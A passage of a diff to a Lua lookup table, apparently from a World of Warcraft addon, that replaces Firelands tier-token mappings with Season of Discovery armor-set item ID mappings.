Giantstalker's Bracers + ["226530"] = { + 16850, -- Giantstalker's Bracers }, - -- Elementium Deathplate Gauntlets - ["71477"] = { - 71669, -- Gauntlets of the Fiery Vanquisher + -- Giantstalker's Boots + ["226531"] = { + 16849, -- Giantstalker's Boots }, - -- Elementium Deathplate Helmet - ["71478"] = { - 71670, -- Crown of the Fiery Vanquisher + -- Giantstalker's Leggings + ["226532"] = { + 16847, -- Giantstalker's Leggings }, - -- Elementium Deathplate Greaves - ["71479"] = { - 71671, -- Leggings of the Fiery Vanquisher + -- Giantstalker's Helmet + ["226533"] = { + 16846, -- Giantstalker's Helmet }, - -- Elementium Deathplate Pauldrons - ["71480"] = { - 71673, -- Shoulders of the Fiery Vanquisher + -- Giantstalker's Breastplate + ["226534"] = { + 16845, -- Giantstalker's Breastplate }, - -- Elementium Deathplate Chestguard - ["71481"] = { - 71672, -- Chest of the Fiery Vanquisher + -- Giantstalker's Chainmail + ["226535"] = { + 227758, -- Molten Scaled Chest }, - -- Elementium Deathplate Handguards - ["71482"] = { - 71669, -- Gauntlets of the Fiery Vanquisher + -- Giantstalker's Guise + ["226536"] = { + 227755, -- Molten Scaled Helm }, - -- Elementium Deathplate Faceguard - ["71483"] = { - 71670, -- Crown of the Fiery Vanquisher + -- Giantstalker's Chain Leggings + ["226537"] = { + 227754, -- Molten Scaled Leggings }, - -- Elementium Deathplate Legguards - ["71484"] = { - 71671, -- Leggings of the Fiery Vanquisher + -- Giantstalker's Sabatons + ["226538"] = { + 227757, -- Molten Scaled Boots }, - -- Elementium Deathplate Shoulderguards - ["71485"] = { - 71673, -- Shoulders of the Fiery Vanquisher + -- Giantstalker's Handguards + ["226540"] = { + 227756, -- Molten Scaled Gloves }, - -- Obsidian Arborweave Raiment - ["71486"] = { - 71672, -- Chest of the Fiery Vanquisher + -- Giantstalker's Wristguards + ["226541"] = { + 227750, -- Molten Scaled Bindings }, - -- Obsidian Arborweave Grips - ["71487"] = { - 71669, -- Gauntlets of the Fiery Vanquisher + -- Giantstalker's Girdle + ["226542"] = { + 227751, -- Molten Scaled Belt }, - -- Obsidian Arborweave Headpiece - ["71488"] = { - 71670, -- Crown of the Fiery Vanquisher + -- Giantstalker's Spauldrons + ["226543"] = { + 227752, -- Molten Scaled Shoulderpads }, - -- Obsidian Arborweave Legguards - ["71489"] = { - 71671, -- Leggings of the Fiery Vanquisher + -- Felheart Pants + ["226547"] = { + 16810, -- Felheart Pants }, - -- Obsidian Arborweave Spaulders - ["71490"] = { - 71673, -- Shoulders of the Fiery Vanquisher + -- Felheart Robes + ["226548"] = { + 16809, -- Felheart Robes }, - -- Obsidian Arborweave Handwraps - ["71491"] = { - 71669, -- Gauntlets of the Fiery Vanquisher + -- Felheart Horns + ["226549"] = { + 16808, -- Felheart Horns }, - -- Obsidian Arborweave Helm - ["71492"] = { - 71670, -- Crown of the Fiery Vanquisher + -- Felheart Shoulder Pads + ["226550"] = { + 16807, -- Felheart Shoulder Pads }, - -- Obsidian Arborweave Legwraps - ["71493"] = { - 71671, -- Leggings of the Fiery Vanquisher + -- Felheart Belt + ["226551"] = { + 16806, -- Felheart Belt }, - -- Obsidian Arborweave Mantle - ["71495"] = { - 71673, -- Shoulders of the Fiery Vanquisher + -- Felheart Gloves + ["226552"] = { + 16805, -- Felheart Gloves }, - -- Obsidian Arborweave Gloves - ["71496"] = { - 71669, -- Gauntlets of the Fiery Vanquisher + -- Felheart Bracers + ["226553"] = { + 16804, -- Felheart Bracers }, - -- Obsidian Arborweave Cover - ["71497"] = { - 71670, -- Crown of the Fiery Vanquisher + -- Felheart Slippers + ["226554"] = { + 16803, -- Felheart Slippers }, - -- Obsidian Arborweave Leggings - ["71498"] = { - 71671, -- Leggings of the Fiery Vanquisher + -- Arcanist Belt + ["226555"] = { + 16802, -- Arcanist Belt }, - -- Obsidian Arborweave Vestment - ["71499"] = { - 71672, -- Chest of the Fiery Vanquisher + -- Arcanist Gloves + ["226556"] = { + 16801, -- Arcanist Gloves }, - -- Obsidian Arborweave Shoulderwraps - ["71500"] = { - 71673, -- Shoulders of the Fiery Vanquisher + -- Arcanist Boots + ["226557"] = { + 16800, -- Arcanist Boots }, - -- Flamewaker's Tunic - ["71501"] = { - 71686, -- Chest of the Fiery Protector + -- Arcanist Bindings + ["226558"] = { + 16799, -- Arcanist Bindings }, - -- Flamewaker's Gloves - ["71502"] = { - 71683, -- Gauntlets of the Fiery Protector + -- Arcanist Robes + ["226559"] = { + 16798, -- Arcanist Robes }, - -- Flamewaker's Headguard - ["71503"] = { - 71684, -- Crown of the Fiery Protector + -- Arcanist Mantle + ["226560"] = { + 16797, -- Arcanist Mantle }, - -- Flamewaker's Legguards - ["71504"] = { - 71685, -- Leggings of the Fiery Protector + -- Arcanist Leggings + ["226561"] = { + 16796, -- Arcanist Leggings }, - -- Flamewaker's Spaulders - ["71505"] = { - 71687, -- Shoulders of the Fiery Protector + -- Arcanist Crown + ["226562"] = { + 16795, -- Arcanist Crown }, - -- Firehawk Gloves - ["71507"] = { - 71669, -- Gauntlets of the Fiery Vanquisher + -- Arcanist Garments + ["226563"] = { + 227535, -- Incandescent Robe }, - -- Firehawk Hood - ["71508"] = { - 71670, -- Crown of the Fiery Vanquisher + -- Arcanist Headdress + ["226564"] = { + 227532, -- Incandescent Hood }, - -- Firehawk Leggings - ["71509"] = { - 71671, -- Leggings of the Fiery Vanquisher + -- Arcanist Pants + ["226565"] = { + 227534, -- Incandescent Leggings }, - -- Firehawk Robes - ["71510"] = { - 71672, -- Chest of the Fiery Vanquisher + -- Arcanist Shoulders + ["226566"] = { + 227537, -- Incandescent Shoulderpads }, - -- Firehawk Mantle - ["71511"] = { - 71673, -- Shoulders of the Fiery Vanquisher + -- Arcanist Wristwraps + ["226567"] = { + 227531, -- Incandescent Bindings }, - -- Immolation Battleplate - ["71512"] = { - 71679, -- Chest of the Fiery Conqueror + -- Arcanist Sandals + ["226568"] = { + 227536, -- Incandescent Boots }, - -- Immolation Gauntlets - ["71513"] = { - 71676, -- Gauntlets of the Fiery Conqueror + -- Arcanist Handguards + ["226569"] = { + 227533, -- Incandescent Gloves }, - -- Immolation Helmet - ["71514"] = { - 71677, -- Crown of the Fiery Conqueror + -- Arcanist Cord + ["226570"] = { + 227530, -- Incandescent Belt }, - -- Immolation Legplates - ["71515"] = { - 71678, -- Leggings of the Fiery Conqueror + -- Boots of Prophecy + ["226571"] = { + 16811, -- Boots of Prophecy }, - -- Immolation Pauldrons - ["71516"] = { - 71680, -- Shoulders of the Fiery Conqueror + -- Gloves of Prophecy + ["226572"] = { + 16812, -- Gloves of Prophecy }, - -- Immolation Breastplate - ["71517"] = { - 71679, -- Chest of the Fiery Conqueror + -- Circlet of Prophecy + ["226573"] = { + 16813, -- Circlet of Prophecy }, - -- Immolation Gloves - ["71518"] = { - 71676, -- Gauntlets of the Fiery Conqueror + -- Pants of Prophecy + ["226574"] = { + 16814, -- Pants of Prophecy }, - -- Immolation Headguard - ["71519"] = { - 71677, -- Crown of the Fiery Conqueror + -- Robes of Prophecy + ["226575"] = { + 16815, -- Robes of Prophecy }, - -- Immolation Greaves - ["71520"] = { - 71678, -- Leggings of the Fiery Conqueror + -- Mantle of Prophecy + ["226576"] = { + 16816, -- Mantle of Prophecy }, - -- Immolation Mantle - ["71521"] = { - 71680, -- Shoulders of the Fiery Conqueror + -- Girdle of Prophecy + ["226577"] = { + 16817, -- Girdle of Prophecy }, - -- Immolation Chestguard - ["71522"] = { - 71679, -- Chest of the Fiery Conqueror + -- Vambraces of Prophecy + ["226578"] = { + 16819, -- Vambraces of Prophecy }, - -- Immolation Handguards - ["71523"] = { - 71676, -- Gauntlets of the Fiery Conqueror + -- Wristwraps of Prophecy + ["226579"] = { + 227531, -- Incandescent Bindings }, - -- Immolation Faceguard - ["71524"] = { - 71677, -- Crown of the Fiery Conqueror + -- Belt of Prophecy + ["226580"] = { + 227530, -- Incandescent Belt }, - -- Immolation Legguards - ["71525"] = { - 71678, -- Leggings of the Fiery Conqueror + -- Shoulderpads of Prophecy + ["226581"] = { + 227537, -- Incandescent Shoulderpads }, - -- Immolation Shoulderguards - ["71526"] = { - 71680, -- Shoulders of the Fiery Conqueror + -- Garments of Prophecy + ["226582"] = { + 227535, -- Incandescent Robe }, - -- Handwraps of the Cleansing Flame - ["71527"] = { - 71676, -- Gauntlets of the Fiery Conqueror + -- Leggings of Prophecy + ["226583"] = { + 227534, -- Incandescent Leggings }, - -- Cowl of the Cleansing Flame - ["71528"] = { - 71677, -- Crown of the Fiery Conqueror + -- Crown of Prophecy + ["226584"] = { + 227532, -- Incandescent Hood }, - -- Legwraps of the Cleansing Flame - ["71529"] = { - 71678, -- Leggings of the Fiery Conqueror + -- Hands of Prophecy + ["226585"] = { + 227533, -- Incandescent Gloves }, - -- Robes of the Cleansing Flame - ["71530"] = { - 71679, -- Chest of the Fiery Conqueror + -- Sandals of Prophecy + ["226586"] = { + 227536, -- Incandescent Boots }, - -- Mantle of the Cleansing Flame - ["71531"] = { - 71680, -- Shoulders of the Fiery Conqueror + -- Lawbringer Spaulders + ["226588"] = { + 16856, -- Lawbringer Spaulders }, - -- Gloves of the Cleansing Flame - ["71532"] = { - 71676, -- Gauntlets of the Fiery Conqueror + -- Lawbringer Bracers + ["226589"] = { + 16857, -- Lawbringer Bracers }, - -- Hood of the Cleansing Flame - ["71533"] = { - 71677, -- Crown of the Fiery Conqueror + -- Lawbringer Helm + ["226590"] = { + 16854, -- Lawbringer Helm }, - -- Leggings of the Cleansing Flame - ["71534"] = { - 71678, -- Leggings of the Fiery Conqueror + -- Lawbringer Gauntlets + ["226591"] = { + 16860, -- Lawbringer Gauntlets }, - -- Vestment of the Cleansing Flame - ["71535"] = { - 71679, -- Chest of the Fiery Conqueror + -- Lawbringer Belt + ["226592"] = { + 16858, -- Lawbringer Belt }, - -- Shoulderwraps of the Cleansing Flame - ["71536"] = { - 71680, -- Shoulders of the Fiery Conqueror + -- Lawbringer Boots + ["226593"] = { + 16859, -- Lawbringer Boots }, - -- Dark Phoenix Tunic - ["71537"] = { - 71672, -- Chest of the Fiery Vanquisher + -- Lawbringer Legplates + ["226594"] = { + 16855, -- Lawbringer Legplates }, - -- Dark Phoenix Gloves - ["71538"] = { - 71669, -- Gauntlets of the Fiery Vanquisher + -- Lawbringer Chestguard + ["226595"] = { + 16853, -- Lawbringer Chestguard }, - -- Dark Phoenix Helmet - ["71539"] = { - 71670, -- Crown of the Fiery Vanquisher + -- Lawbringer Warbands + ["226596"] = { + 227750, -- Molten Scaled Bindings }, - -- Dark Phoenix Legguards - ["71540"] = { - 71671, -- Leggings of the Fiery Vanquisher + -- Lawbringer Girdle + ["226597"] = { + 227751, -- Molten Scaled Belt }, - -- Dark Phoenix Spaulders - ["71541"] = { - 71673, -- Shoulders of the Fiery Vanquisher + -- Lawbringer Leggings + ["226598"] = { + 227754, -- Molten Scaled Leggings }, - -- Erupting Volcanic Tunic - ["71542"] = { - 71686, -- Chest of the Fiery Protector + -- Lawbringer Crown + ["226599"] = { + 227755, -- Molten Scaled Helm }, - -- Erupting Volcanic Handwraps - ["71543"] = { - 71683, -- Gauntlets of the Fiery Protector + -- Lawbringer Grips + ["226600"] = { + 227756, -- Molten Scaled Gloves }, - -- Erupting Volcanic Faceguard - ["71544"] = { - 71684, -- Crown of the Fiery Protector + -- Lawbringer Battleboots + ["226601"] = { + 227757, -- Molten Scaled Boots }, - -- Erupting Volcanic Legwraps - ["71545"] = { - 71685, -- Leggings of the Fiery Protector + -- Lawbringer Breastplate + ["226602"] = { + 227758, -- Molten Scaled Chest }, - -- Erupting Volcanic Mantle - ["71546"] = { - 71687, -- Shoulders of the Fiery Protector + -- Lawbringer Vambraces + ["226603"] = { + 227750, -- Molten Scaled Bindings }, - -- Erupting Volcanic Cuirass - ["71547"] = { - 71686, -- Chest of the Fiery Protector + -- Lawbringer Battlebelt + ["226604"] = { + 227751, -- Molten Scaled Belt }, - -- Erupting Volcanic Grips - ["71548"] = { - 71683, -- Gauntlets of the Fiery Protector + -- Lawbringer Pauldrons + ["226605"] = { + 227752, -- Molten Scaled Shoulderpads }, - -- Erupting Volcanic Helmet - ["71549"] = { - 71684, -- Crown of the Fiery Protector + -- Lawbringer Legguards + ["226606"] = { + 227754, -- Molten Scaled Leggings }, - -- Erupting Volcanic Legguards - ["71550"] = { - 71685, -- Leggings of the Fiery Protector + -- Lawbringer Headguard + ["226607"] = { + 227755, -- Molten Scaled Helm }, - -- Erupting Volcanic Spaulders - ["71551"] = { - 71687, -- Shoulders of the Fiery Protector + -- Lawbringer Handguards + ["226608"] = { + 227756, -- Molten Scaled Gloves }, - -- Erupting Volcanic Hauberk - ["71552"] = { - 71686, -- Chest of the Fiery Protector + -- Lawbringer Sabatons + ["226609"] = { + 227757, -- Molten Scaled Boots }, - -- Erupting Volcanic Gloves - ["71553"] = { - 71683, -- Gauntlets of the Fiery Protector + -- Lawbringer Chestplate + ["226610"] = { + 227758, -- Molten Scaled Chest }, - -- Erupting Volcanic Headpiece - ["71554"] = { - 71684, -- Crown of the Fiery Protector + -- Earthfury Epaulets + ["226611"] = { + 16844, -- Earthfury Epaulets }, - -- Erupting Volcanic Kilt - ["71555"] = { - 71685, -- Leggings of the Fiery Protector + -- Earthfury Helmet + ["226612"] = { + 16842, -- Earthfury Helmet }, - -- Erupting Volcanic Shoulderwraps - ["71556"] = { - 71687, -- Shoulders of the Fiery Protector + -- Earthfury Boots + ["226613"] = { + 16837, -- Earthfury Boots }, - -- Ranseur of Hatred - ["71557"] = { - 71617, -- Crystallized Firestone + -- Earthfury Legguards + ["226614"] = { + 16843, -- Earthfury Legguards }, - -- Lava Bolt Crossbow - ["71558"] = { - 71617, -- Crystallized Firestone + -- Earthfury Gauntlets + ["226615"] = { + 16839, -- Earthfury Gauntlets }, - -- Spire of Scarlet Pain - ["71559"] = { - 71617, -- Crystallized Firestone + -- Earthfury Belt + ["226616"] = { + 16838, -- Earthfury Belt }, - -- Chelley's Sterilized Scalpel - ["71560"] = { - 71617, -- Crystallized Firestone + -- Earthfury Vestments + ["226617"] = { + 16841, -- Earthfury Vestments }, - -- Hide-Bound Chains - ["71561"] = { - 71617, -- Crystallized Firestone + -- Earthfury Bracers + ["226618"] = { + 16840, -- Earthfury Bracers }, - -- Obsidium Cleaver - ["71562"] = { - 71617, -- Crystallized Firestone + -- Earthfury Ringmail + ["226619"] = { + 227758, -- Molten Scaled Chest }, - -- Firebound Gorget - ["71563"] = { - 71617, -- Crystallized Firestone + -- Earthfury Walkers + ["226620"] = { + 227757, -- Molten Scaled Boots }, - -- Theck's Emberseal - ["71564"] = { - 71617, -- Crystallized Firestone + -- Earthfury Hands + ["226621"] = { + 227756, -- Molten Scaled Gloves }, - -- Trail of Embers - ["71575"] = { - 71617, -- Crystallized Firestone + -- Earthfury Visor + ["226622"] = { + 227755, -- Molten Scaled Helm }, - -- Scorchvine Wand - ["71579"] = { - 71617, -- Crystallized Firestone + -- Earthfury Leggings + ["226623"] = { + 227754, -- Molten Scaled Leggings }, - -- Balespider's Handwraps - ["71594"] = { - 71676, -- Gauntlets of the Fiery Conqueror + -- Earthfury Mantle + ["226624"] = { + 227752, -- Molten Scaled Shoulderpads }, - -- Balespider's Hood - ["71595"] = { - 71677, -- Crown of the Fiery Conqueror + -- Earthfury Cord + ["226625"] = { + 227751, -- Molten Scaled Belt }, - -- Balespider's Leggings - ["71596"] = { - 71678, -- Leggings of the Fiery Conqueror + -- Earthfury Wristbands + ["226626"] = { + 227750, -- Molten Scaled Bindings }, - -- Balespider's Robes - ["71597"] = { - 71679, -- Chest of the Fiery Conqueror + -- Earthfury Scalemail + ["226627"] = { + 227758, -- Molten Scaled Chest }, - -- Balespider's Mantle - ["71598"] = { - 71680, -- Shoulders of the Fiery Conqueror + -- Earthfury Sabatons + ["226628"] = { + 227757, -- Molten Scaled Boots }, - -- Helmet of the Molten Giant - ["71599"] = { - 71684, -- Crown of the Fiery Protector + -- Earthfury Handguards + ["226629"] = { + 227756, -- Molten Scaled Gloves }, - -- Battleplate of the Molten Giant - ["71600"] = { - 71686, -- Chest of the Fiery Protector + -- Earthfury Greathelm + ["226630"] = { + 227755, -- Molten Scaled Helm }, - -- Gauntlets of the Molten Giant - ["71601"] = { - 71683, -- Gauntlets of the Fiery Protector + -- Earthfury Scaled Leggings + ["226631"] = { + 227754, -- Molten Scaled Leggings }, - -- Legplates of the Molten Giant - ["71602"] = { - 71685, -- Leggings of the Fiery Protector + -- Earthfury Pauldrons + ["226632"] = { + 227752, -- Molten Scaled Shoulderpads }, - -- Pauldrons of the Molten Giant - ["71603"] = { - 71687, -- Shoulders of the Fiery Protector + -- Earthfury Waistguard + ["226633"] = { + 227751, -- Molten Scaled Belt }, - -- Chestguard of the Molten Giant - ["71604"] = { - 71686, -- Chest of the Fiery Protector + -- Earthfury Wristguards + ["226634"] = { + 227750, -- Molten Scaled Bindings }, - -- Handguards of the Molten Giant - ["71605"] = { - 71683, -- Gauntlets of the Fiery Protector + -- Earthfury Chainmail + ["226635"] = { + 227758, -- Molten Scaled Chest }, - -- Faceguard of the Molten Giant - ["71606"] = { - 71684, -- Crown of the Fiery Protector + -- Earthfury Battleboots + ["226636"] = { + 227757, -- Molten Scaled Boots }, - -- Legguards of the Molten Giant - ["71607"] = { - 71685, -- Leggings of the Fiery Protector + -- Earthfury Grips + ["226637"] = { + 227756, -- Molten Scaled Gloves }, - -- Shoulderguards of the Molten Giant - ["71608"] = { - 71687, -- Shoulders of the Fiery Protector + -- Earthfury Headpiece + ["226638"] = { + 227755, -- Molten Scaled Helm }, - -- Crystallized Firestone - ["71617"] = { - 69109, -- Scales of Life - 69113, -- Apparatus of Khaz'goroth - 71557, -- Ranseur of Hatred - 71558, -- Lava Bolt Crossbow - 71559, -- Spire of Scarlet Pain - 71560, -- Chelley's Sterilized Scalpel - 71561, -- Hide-Bound Chains - 71562, -- Obsidium Cleaver - 71563, -- Firebound Gorget - 71564, -- Theck's Emberseal - 71575, -- Trail of Embers - 71579, -- Scorchvine Wand - 71641, -- Riplimb's Lost Collar + -- Earthfury Chain Leggings + ["226639"] = { + 227754, -- Molten Scaled Leggings }, - -- Riplimb's Lost Collar - ["71641"] = { - 71617, -- Crystallized Firestone + -- Earthfury Spaulders + ["226640"] = { + 227752, -- Molten Scaled Shoulderpads }, - -- Helm of the Fiery Vanquisher - ["71668"] = { - 70954, -- Elementium Deathplate Faceguard - 71047, -- Dark Phoenix Helmet - 71060, -- Elementium Deathplate Helmet - 71098, -- Obsidian Arborweave Headpiece - 71103, -- Obsidian Arborweave Helm - 71108, -- Obsidian Arborweave Cover - 71287, -- Firehawk Hood + -- Earthfury Girdle + ["226641"] = { + 227751, -- Molten Scaled Belt }, - -- Gauntlets of the Fiery Vanquisher - ["71669"] = { - 71477, -- Elementium Deathplate Gauntlets - 71482, -- Elementium Deathplate Handguards - 71487, -- Obsidian Arborweave Grips - 71491, -- Obsidian Arborweave Handwraps - 71496, -- Obsidian Arborweave Gloves - 71507, -- Firehawk Gloves - 71538, -- Dark Phoenix Gloves + -- Earthfury Bindings + ["226642"] = { + 227750, -- Molten Scaled Bindings }, - -- Crown of the Fiery Vanquisher - ["71670"] = { - 71478, -- Elementium Deathplate Helmet - 71483, -- Elementium Deathplate Faceguard - 71488, -- Obsidian Arborweave Headpiece - 71492, -- Obsidian Arborweave Helm - 71497, -- Obsidian Arborweave Cover - 71508, -- Firehawk Hood - 71539, -- Dark Phoenix Helmet + -- Cenarion Spaulders + ["226644"] = { + 16836, -- Cenarion Spaulders }, - -- Leggings of the Fiery Vanquisher - ["71671"] = { - 71479, -- Elementium Deathplate Greaves - 71484, -- Elementium Deathplate Legguards - 71489, -- Obsidian Arborweave Legguards - 71493, -- Obsidian Arborweave Legwraps - 71498, -- Obsidian Arborweave Leggings - 71509, -- Firehawk Leggings - 71540, -- Dark Phoenix Legguards + -- Cenarion Boots + ["226645"] = { + 16829, -- Cenarion Boots }, - -- Chest of the Fiery Vanquisher - ["71672"] = { - 71476, -- Elementium Deathplate Breastplate - 71481, -- Elementium Deathplate Chestguard - 71486, -- Obsidian Arborweave Raiment - 71499, -- Obsidian Arborweave Vestment - 71510, -- Firehawk Robes - 71537, -- Dark Phoenix Tunic + -- Cenarion Leggings + ["226646"] = { + 16835, -- Cenarion Leggings }, - -- Shoulders of the Fiery Vanquisher - ["71673"] = { - 71480, -- Elementium Deathplate Pauldrons - 71485, -- Elementium Deathplate Shoulderguards - 71490, -- Obsidian Arborweave Spaulders - 71495, -- Obsidian Arborweave Mantle - 71500, -- Obsidian Arborweave Shoulderwraps - 71511, -- Firehawk Mantle - 71541, -- Dark Phoenix Spaulders + -- Cenarion Helm + ["226647"] = { + 16834, -- Cenarion Helm }, - -- Mantle of the Fiery Vanquisher - ["71674"] = { - 70951, -- Elementium Deathplate Shoulderguards - 71049, -- Dark Phoenix Spaulders - 71062, -- Elementium Deathplate Pauldrons - 71101, -- Obsidian Arborweave Spaulders - 71106, -- Obsidian Arborweave Mantle - 71111, -- Obsidian Arborweave Shoulderwraps - 71290, -- Firehawk Mantle + -- Cenarion Gloves + ["226648"] = { + 16831, -- Cenarion Gloves }, - -- Helm of the Fiery Conqueror - ["71675"] = { - 70948, -- Immolation Faceguard - 71065, -- Immolation Helmet - 71093, -- Immolation Headguard - 71272, -- Cowl of the Cleansing Flame - 71277, -- Hood of the Cleansing Flame - 71282, -- Balespider's Hood + -- Cenarion Bracers + ["226649"] = { + 16830, -- Cenarion Bracers }, - -- Gauntlets of the Fiery Conqueror - ["71676"] = { - 71513, -- Immolation Gauntlets - 71518, -- Immolation Gloves - 71523, -- Immolation Handguards - 71527, -- Handwraps of the Cleansing Flame - 71532, -- Gloves of the Cleansing Flame - 71594, -- Balespider's Handwraps + -- Cenarion Belt + ["226650"] = { + 16828, -- Cenarion Belt }, - -- Crown of the Fiery Conqueror - ["71677"] = { - 71514, -- Immolation Helmet - 71519, -- Immolation Headguard - 71524, -- Immolation Faceguard - 71528, -- Cowl of the Cleansing Flame - 71533, -- Hood of the Cleansing Flame - 71595, -- Balespider's Hood + -- Cenarion Pants + ["226651"] = { + 227763, -- Scorched Core Leggings }, - -- Leggings of the Fiery Conqueror - ["71678"] = { - 71515, -- Immolation Legplates - 71520, -- Immolation Greaves - 71525, -- Immolation Legguards - 71529, -- Legwraps of the Cleansing Flame - 71534, -- Leggings of the Cleansing Flame - 71596, -- Balespider's Leggings + -- Cenarion Sandals + ["226652"] = { + 227765, -- Scorched Core Boots }, - -- Chest of the Fiery Conqueror - ["71679"] = { - 71512, -- Immolation Battleplate - 71517, -- Immolation Breastplate - 71522, -- Immolation Chestguard - 71530, -- Robes of the Cleansing Flame - 71535, -- Vestment of the Cleansing Flame - 71597, -- Balespider's Robes + -- Cenarion Mantle + ["226653"] = { + 227762, -- Scorched Core Shoulderpads }, - -- Shoulders of the Fiery Conqueror - ["71680"] = { - 71516, -- Immolation Pauldrons - 71521, -- Immolation Mantle - 71526, -- Immolation Shoulderguards - 71531, -- Mantle of the Cleansing Flame - 71536, -- Shoulderwraps of the Cleansing Flame - 71598, -- Balespider's Mantle + -- Cenarion Gauntlets + ["226654"] = { + 227759, -- Scorched Core Gloves }, - -- Mantle of the Fiery Conqueror - ["71681"] = { - 70946, -- Immolation Shoulderguards - 71067, -- Immolation Pauldrons - 71095, -- Immolation Mantle - 71275, -- Mantle of the Cleansing Flame - 71280, -- Shoulderwraps of the Cleansing Flame - 71285, -- Balespider's Mantle + -- Cenarion Wrists + ["226655"] = { + 227760, -- Scorched Core Bindings }, - -- Helm of the Fiery Protector - ["71682"] = { - 70944, -- Faceguard of the Molten Giant - 71051, -- Flamewaker's Headguard - 71070, -- Helmet of the Molten Giant - 71293, -- Erupting Volcanic Headpiece - 71298, -- Erupting Volcanic Faceguard - 71303, -- Erupting Volcanic Helmet + -- Cenarion Embrace + ["226656"] = { + 227766, -- Scorched Core Chest }, - -- Gauntlets of the Fiery Protector - ["71683"] = { - 71502, -- Flamewaker's Gloves - 71543, -- Erupting Volcanic Handwraps - 71548, -- Erupting Volcanic Grips - 71553, -- Erupting Volcanic Gloves - 71601, -- Gauntlets of the Molten Giant - 71605, -- Handguards of the Molten Giant + -- Cenarion Cord + ["226657"] = { + 227761, -- Scorched Core Belt }, - -- Crown of the Fiery Protector - ["71684"] = { - 71503, -- Flamewaker's Headguard - 71544, -- Erupting Volcanic Faceguard - 71549, -- Erupting Volcanic Helmet - 71554, -- Erupting Volcanic Headpiece - 71599, -- Helmet of the Molten Giant - 71606, -- Faceguard of the Molten Giant + -- Cenarion Antlers + ["226658"] = { + 227764, -- Scorched Core Helm }, - -- Leggings of the Fiery Protector - ["71685"] = { - 71504, -- Flamewaker's Legguards - 71545, -- Erupting Volcanic Legwraps - 71550, -- Erupting Volcanic Legguards - 71555, -- Erupting Volcanic Kilt - 71602, -- Legplates of the Molten Giant - 71607, -- Legguards of the Molten Giant + -- Cenarion Horns + ["226659"] = { + 227764, -- Scorched Core Helm }, - -- Chest of the Fiery Protector - ["71686"] = { - 71501, -- Flamewaker's Tunic - 71542, -- Erupting Volcanic Tunic - 71547, -- Erupting Volcanic Cuirass - 71552, -- Erupting Volcanic Hauberk - 71600, -- Battleplate of the Molten Giant - 71604, -- Chestguard of the Molten Giant + -- Cenarion Girdle + ["226660"] = { + 227761, -- Scorched Core Belt }, - -- Shoulders of the Fiery Protector - ["71687"] = { - 71505, -- Flamewaker's Spaulders - 71546, -- Erupting Volcanic Mantle - 71551, -- Erupting Volcanic Spaulders - 71556, -- Erupting Volcanic Shoulderwraps - 71603, -- Pauldrons of the Molten Giant - 71608, -- Shoulderguards of the Molten Giant + -- Cenarion Tunic + ["226661"] = { + 227766, -- Scorched Core Chest }, - -- Mantle of the Fiery Protector - ["71688"] = { - 70941, -- Shoulderguards of the Molten Giant - 71053, -- Flamewaker's Spaulders - 71072, -- Pauldrons of the Molten Giant - 71295, -- Erupting Volcanic Shoulderwraps - 71300, -- Erupting Volcanic Mantle - 71305, -- Erupting Volcanic Spaulders + -- Cenarion Bands + ["226662"] = { + 227760, -- Scorched Core Bindings }, - -- Lavaquake Legwraps - ["71980"] = { - 71998, -- Essence of Destruction + -- Cenarion Treads + ["226663"] = { + 227765, -- Scorched Core Boots }, - -- World Mender's Pants - ["71981"] = { - 71998, -- Essence of Destruction + -- Cenarion Fists + ["226664"] = { + 227759, -- Scorched Core Gloves }, - -- Pyrium Legplates of Purified Evil - ["71982"] = { - 71998, -- Essence of Destruction + -- Cenarion Shoulders + ["226665"] = { + 227762, -- Scorched Core Shoulderpads }, - -- Unstoppable Destroyer's Legplates - ["71983"] = { - 71998, -- Essence of Destruction + -- Cenarion Trousers + ["226666"] = { + 227763, -- Scorched Core Leggings }, - -- Foundations of Courage - ["71984"] = { - 71998, -- Essence of Destruction + -- Cenarion Waistguard + ["226667"] = { + 227761, -- Scorched Core Belt }, - -- Bladeshadow Leggings - ["71985"] = { - 71998, -- Essence of Destruction + -- Cenarion Wristguards + ["226668"] = { + 227760, -- Scorched Core Bindings }, - -- Leggings of Nature's Champion - ["71986"] = { - 71998, -- Essence of Destruction + -- Cenarion Grips + ["226669"] = { + 227759, -- Scorched Core Gloves }, - -- Rended Earth Leggings - ["71987"] = { - 71998, -- Essence of Destruction + -- Cenarion Crown + ["226670"] = { + 227764, -- Scorched Core Helm }, - -- Deathscale Leggings - ["71988"] = { - 71998, -- Essence of Destruction + -- Cenarion Legguards + ["226671"] = { + 227763, -- Scorched Core Leggings }, - -- Bracers of Unconquered Power - ["71989"] = { - 71998, -- Essence of Destruction + -- Cenarion Walkers + ["226673"] = { + 227765, -- Scorched Core Boots }, - -- Dreamwraps of the Light - ["71990"] = { - 71998, -- Essence of Destruction + -- Cenarion Pauldrons + ["226674"] = { + 227762, -- Scorched Core Shoulderpads }, - -- Soul Redeemer Bracers - ["71991"] = { - 71998, -- Essence of Destruction + -- Cenarion Armor + ["226675"] = { + 227766, -- Scorched Core Chest }, - -- Bracers of Destructive Strength - ["71992"] = { - 71998, -- Essence of Destruction + -- Shadowcraft Tunic + ["226700"] = { + 16721, -- Shadowcraft Tunic }, - -- Titanguard Wristplates - ["71993"] = { - 71998, -- Essence of Destruction + -- Shadowcraft Belt + ["226701"] = { + 16713, -- Shadowcraft Belt }, - -- Bladeshadow Wristguards - ["71994"] = { - 71998, -- Essence of Destruction + -- Shadowcraft Gloves + ["226702"] = { + 16712, -- Shadowcraft Gloves }, - -- Bracers of Flowing Serenity - ["71995"] = { - 71998, -- Essence of Destruction + -- Shadowcraft Boots + ["226703"] = { + 16711, -- Shadowcraft Boots }, - -- Bracers of the Hunter-Killer - ["71996"] = { - 71998, -- Essence of Destruction + -- Shadowcraft Bracers + ["226704"] = { + 16710, -- Shadowcraft Bracers }, - -- Thundering Deathscale Wristguards - ["71997"] = { - 71998, -- Essence of Destruction + -- Shadowcraft Pants + ["226705"] = { + 16709, -- Shadowcraft Pants }, - -- Essence of Destruction - ["71998"] = { - 71980, -- Lavaquake Legwraps - 71981, -- World Mender's Pants - 71982, -- Pyrium Legplates of Purified Evil - 71983, -- Unstoppable Destroyer's Legplates - 71984, -- Foundations of Courage - 71985, -- Bladeshadow Leggings - 71986, -- Leggings of Nature's Champion - 71987, -- Rended Earth Leggings - 71988, -- Deathscale Leggings - 71989, -- Bracers of Unconquered Power - 71990, -- Dreamwraps of the Light - 71991, -- Soul Redeemer Bracers - 71992, -- Bracers of Destructive Strength - 71993, -- Titanguard Wristplates - 71994, -- Bladeshadow Wristguards - 71995, -- Bracers of Flowing Serenity - 71996, -- Bracers of the Hunter-Killer - 71997, -- Thundering Deathscale 